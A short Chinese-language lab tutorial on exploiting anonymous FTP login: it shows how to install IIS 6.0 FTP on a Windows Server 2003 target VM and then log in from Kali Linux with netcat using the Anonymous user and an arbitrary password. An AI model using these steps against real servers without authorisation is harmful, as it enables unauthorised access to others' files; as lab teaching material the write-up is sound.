kali linux攻击靶机win2K3实验------FTP匿名登录漏洞

由于FTP没有禁止匿名用户，所以可以直接使用Anonymous用户直接登录FTP服务器。

1.win2k3靶机FTP搭建

step1:安装win2k3FTP服务所需要的文件IIS6.0

       链接：https://pan.baidu.com/s/1fOH_SPUdMi7FecjN4Ofe5A 
       提取码：9lr7 
step2:安装win2k3所需程序

IIS 6.0 适用于Windows server 2003系统安装步骤如下:
开始---控制面板----添加/删除程序----添加/删除Windows组件(A)----应用程序服务器---
将解压后的IIS文件路径复制到"文件复制来源"输入框(会出现多次,就多粘贴几次)--完成.
如出现需要"插入安装光盘"这类的提示,继续粘贴该路径即可.

step3:安装FTP程序 

添加删除程序----应用程序服务器----详细信息-----Internet(信息服务IIS)----详细信息-----文件传输协议（FTP）服务--确定---下一步安装             //配合第2步骤安装 ，安装完成后默认开启安全账户（允许匿名连接）

2.开启kali linux开启入侵过程

命令：nc  192.168.56.129 21

USER Anonymous               // 用户名输入Anonymous 

PASS 123                //密码随便输入

提示：230 Login successful. 表示登陆成功